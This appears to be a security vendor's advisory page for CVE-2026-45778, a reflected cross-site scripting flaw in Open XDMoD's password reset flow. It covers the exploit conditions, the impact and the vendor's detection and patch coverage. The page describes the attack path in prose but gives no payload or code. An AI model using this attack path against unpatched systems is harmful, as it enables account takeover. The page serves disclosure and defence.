How is CVE-2026-45778 exploited?

Network reachability (required): The attacker must reach the Open XDMoD service over the network to inject the payload and trigger the password reset email flow. Authentication (required): A low-privilege Open XDMoD user account is sufficient; no administrative access is needed to stage the attack. Victim interaction (required): The victim must visit the crafted password reset link delivered via email before the malicious JavaScript executes in their browser. Attack complexity (info): The exploit is reliable and condition-free; no race conditions or special environmental factors are required to stage or deliver the payload.

What is the impact of CVE-2026-45778?

Reads the victim's active session tokens and any credential material visible in the browser context. Performs account takeover by capturing or resetting the victim's Open XDMoD credentials. Modifies the victim's Open XDMoD profile and any HPC metrics data the victim's account is authorized to change. Partially disrupts the victim's Open XDMoD access (low availability impact on the victim component per CVSS scoring).

Back to search

HIGHCVE-2026-45778Published 2026-06-05Modified 2026-06-05CNA GitHub_M

CVE-2026-45778: Open XDMoD Vulnerable to Reflected Cross-Site Scripting (XSS) in Password Reset

OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually.

CVSS v4.0: 8.6
Severity: HIGH
Fixed in: —
Affected Products: 1

HarborGuard Analysis

Synopsis

Reflected cross-site scripting (XSS) in Open XDMoD allows an authenticated attacker to inject malicious JavaScript into their user profile and weaponize the password reset email flow to deliver a crafted link to a victim. The attack is reachable over the network, requires a low-privilege account on the attacker's side, and requires the victim to visit the malicious link. Successful exploitation gives the attacker full read and write access to the victim's Open XDMoD session, enabling credential capture and account takeover. A patched-image rebuild at version 11.0.3 is available on HarborGuard for environments running an affected version of ubccr/xdmod.

HarborGuard Coverage

Detection

Detection of CVE-2026-45778 is available across every HarborGuard environment; the CVE is ingested from upstream advisory feeds within minutes of publication and matched against customer images, including custom-built images that bundle Open XDMoD. Any image containing ubccr/xdmod prior to version 11.0.3 is flagged automatically.

Available

Triage

HarborGuard scores this CVE at 8.6 HIGH using the CVSS v4.0 vector and surfaces it with that severity weighting in each customer's findings feed. Per-environment compliance policy weighting applies, and the finding is routed to the inbox or ticketing integration configured for each customer org.

Available

Patch

A patched-image rebuild targeting Open XDMoD 11.0.3 is available on HarborGuard for any environment running an affected image version. For customers who opt into auto-remediation, HarborGuard performs the rebuild, runs a regression test suite, and opens a pull request against affected workloads automatically.

Pending upstream

Exploit Conditions

Network reachabilityRequired
The attacker must reach the Open XDMoD service over the network to inject the payload and trigger the password reset email flow.
AuthenticationRequired
A low-privilege Open XDMoD user account is sufficient; no administrative access is needed to stage the attack.
Victim interactionRequired
The victim must visit the crafted password reset link delivered via email before the malicious JavaScript executes in their browser.
Attack complexityDetail
The exploit is reliable and condition-free; no race conditions or special environmental factors are required to stage or deliver the payload.

Blast Radius

Reads the victim's active session tokens and any credential material visible in the browser context.
Performs account takeover by capturing or resetting the victim's Open XDMoD credentials.
Modifies the victim's Open XDMoD profile and any HPC metrics data the victim's account is authorized to change.
Partially disrupts the victim's Open XDMoD access (low availability impact on the victim component per CVSS scoring).

How HarborGuard Handles This

Available on HarborGuard: images containing ubccr/xdmod are matched against CVE-2026-45778 at ingest time, and a rebuild targeting the patched version 11.0.3 is available for affected environments. For customers who opt into auto-remediation, the typical flow is a rebuilt image, a regression test run, and a pull request opened against affected workloads; for high-severity issues, median time from CVE publication to merged patch PR is around 90 minutes in environments with auto-remediation enabled. Where compliance policy requires manual review before merging, HarborGuard queues the rebuild and PR for engineer approval. Customers who prefer to apply the upstream patch manually (as the advisory suggests as a workaround) can use HarborGuard's findings detail to identify every affected image layer and confirm remediation once the patched image is in place.

See how HarborGuard automates this

Affected packages

ubccr / xdmod
< 11.0.3

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N

References

https://github.com/ubccr/xdmod/security/advisories/GHSA-3pv7-qvc3-h527

Metrics

Get notified